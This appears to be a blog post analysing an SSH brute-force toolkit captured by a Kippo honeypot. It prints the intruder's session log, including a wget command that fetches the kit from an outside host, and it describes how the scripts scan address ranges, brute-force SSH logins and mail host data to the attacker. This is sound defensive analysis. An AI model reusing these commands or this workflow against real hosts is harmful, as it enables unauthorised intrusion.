Fun With a SSH Honeypot (Kippo)

A few months back I ran I Kippo honeypot for a while. Kippo is a SSH honeypot. You can find your own copy at https://code.google.com/p/kippo/ Most of the time I didn’t see anything apart from port scans and large amounts of failed login attempts. But sometimes I woke up, logged into my server and saw I caught some goodies. This is a post that analyses one of those goodies.

Before we start, this is a common ssh scanning kit. This collection has been analysed by a fair bunch of people. Yet, I couldn’t really find the detailed description I was looking for so I though I’d make one. The tools themselves are not really impressive. In this case the attacker didn’t even bother hiding his/here activities. The kit launches verbose tools that you would defiantly notice if you where paying attention to your system.

Lets start with the kippo log our intruder created.

damnsecure:~# perl
bash: perl: command not found
damnsecure:~# http://<redacted>.com/gosh.tgz
bash: http://<redacted>.com/gosh.tgz: command not found
damnsecure:~# wget http://<redacted>.com/gosh.tgz
--2013-02-05 00:49:15--  http://<redacted>.com/gosh.tgz
Connecting to <redacted>.com:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 680051 (664K) [application/x-tar]
Saving to: `gosh.tgz

100%[======================================>] 680,051      219K/s  eta 0s  

2013-02-05 00:49:18 (219 KB/s) - `gosh.tgz' saved [680051/680051]
damnsecure:~# tar xfzv gosh.tgz
gosh
gosh/gen-pass.sh
gosh/common
gosh/scam
gosh/pscan2
gosh/mfu.txt
gosh/secure
gosh/go.sh
gosh/ssh-scan
gosh/ss
gosh/pass_file
gosh/a
gosh/vuln.txt
damnsecure:~# cd gosh
damnsecure:~/gosh# chmode +x *(
bash: chmode: command not found
damnsecure:~/gosh# chmode +x *
bash: chmode: command not found
damnsecure:~/gosh# chmod +x *
damnsecure:~/gosh# ./scam
  ___ 
 {o,o}
 |)__)
 -"-"-
O RLY?

Nothing really interesting. In short what happend:

  1. User found successful SSH login on my honeypot.

  2. Downloads toolkit

  3. Crash and burns since its a simulated environment. The attacker realises this and leaves.

Now this is a very small collection of file (12 files). This is a short description of what every file does:

gosh/gen-pass.sh: Creates a <username> <password> file. Where username is the first argument and the second is a password dictionary file. I don’t really understand why this file is in this kit. Mainly because its something I would do on my own system and then distribute the dictionaries. File is probably here because this is quite a standard ssh scanning kit and it is distributed with this bash file.

gosh/common: Dictionary with 3343 passwords. Think this file is shipped by default with this kit by its creator.

gosh/scam: This file is launched by the attacker (see kippo log).

It kicks off by collecting basic system info: ifconfig, uptime, uname, /etc/issue, /etc/passwd, id, df -h and emails it to the attacker.

Then it start an other bash file called ‘a’ with one argument ‘$1.x’ where $1 is the first byte value for the IP address and the second one is simply a counter. So in total ‘a’ is launched 255 times.

gosh/a: This script is the script that takes care of a large set of IP’s.

  1. Launches pscan2. With arguments $1.x <b class> $2 portnr <22>. This creates a list with ip’s in $1.pscan.22.¬†pscan2 finishes completely.

  2. After this $1.pscan.22 is sorted and a unique list of the output in saved into mfu.txt

  3. ssh-scan gets launched with parameter 100 – I don’t really know what the 100 here means. My binary reversing skills are not very good – the results of ssh-scan are added to vuln.txt. This gets emailed to the attacker.

  4. $1.pscan.22 and mfu.txt get removed.

After this the scam script launches the same script but in $1.x+1 b-class.

gosh/pscan2: As far as a can see and find on the interwebs pscan2 is a basic port scanner. The source code for quite a similar piece of software can be found here:¬†http://calebcoffie.com/honeypot-treasure-6-ssh-bruteforcer-in-c/. This file is used by one of the bash script (‘a’) to launch a scanner that checks for a running service on port 22.

gosh/mfu.txt: Pretty sure this file contains a list with IP’s with an active SSH service running on port 22.

gosh/secure: File removes execution rights (chmod -x /usr/bin/mail) from /usr/bin/mail and then moves it to /usr/bin/s8. It seems like this file isn’t used in any of the automated scripts. What I don’t understand (maybe one of you can answer this for me). Why this script is added to this kit. Mainly because the mail binary is used in every other script. So making the mail binary unavailable would break basically every script in this tgz file….

gosh/go.sh: An other launch script. Launches ‘ss’ and ssh-scan. Not really sure if this is used.

  1. Launches ‘ss’ with arguments 22 -a $1 -i eth0 -s 7. Port 22, b-class, interface an speed (1-10 (slow->fastest)). The output is saved in ‘bios.txt’

  2. Creates a unique list of IP’s and saves it into mfu.txt

  3. Launches ssh-scan

  4. Removes bios.txt

gosh/ssh-scan: I this is the ssh brute force login scanner. Successful logins are saved into vuln.txt I think.

gosh/ss: Think this file simply scans a port to grab the banner. This way the attacker can filter out vulnerable SSH installations. Is used in ‘a’ as you can see above.

gosh/pass_file: This is a default list with logins. Contains 3777 unique usernames. 6098 unique passwords

gosh/vuln.txt: List with vulnerable hosts generated by ssh-scan


Now this is the first time I did any type of analysis on a piece of malicious software. So if I got anything wrong, please do leave a message.

In case you where wondering if I looked into the attacker. I did find a gaming site where it seemed like his/here email was used to register. Also, I noticed the IP or origin was in Romania. This gave me the impression that no proxy was used. I decided to unpublished the attackers details for obvious reasons.

I hope you enjoyed this quick write up.

Signature: MD5 (a) = 8883ef6b3f4016c3e0cea2fc2546268a

MD5 (common) = d32a54466abc11b2daae68f60d5d0967

MD5 (gen-pass.sh) = 615c08bb1acdf2f21490450991766187

MD5 (go.sh) = 212f1bc330064d2360fb2d662c7d6124

MD5 (mfu.txt) = d41d8cd98f00b204e9800998ecf8427e

MD5 (pass_file) = 63e9d967580829bd7e5b51487540d4fe

MD5 (pscan2) = acba0143d0cbcf8092b8b44d914d7983

MD5 (scam) = 5b10eaf79949cd46d002cb9d73b5eb1a

MD5 (secure) = 39acbfc1e983e45308cdab2d3ec4bf34

MD5 (ss) = b51a52c9c82bb4401659b4c17c60f89f

MD5 (ssh-scan) = a213ebd69fbc11d612d0374b373f65d8

MD5 (vuln.txt) = d41d8cd98f00b204e9800998ecf8427e

Comments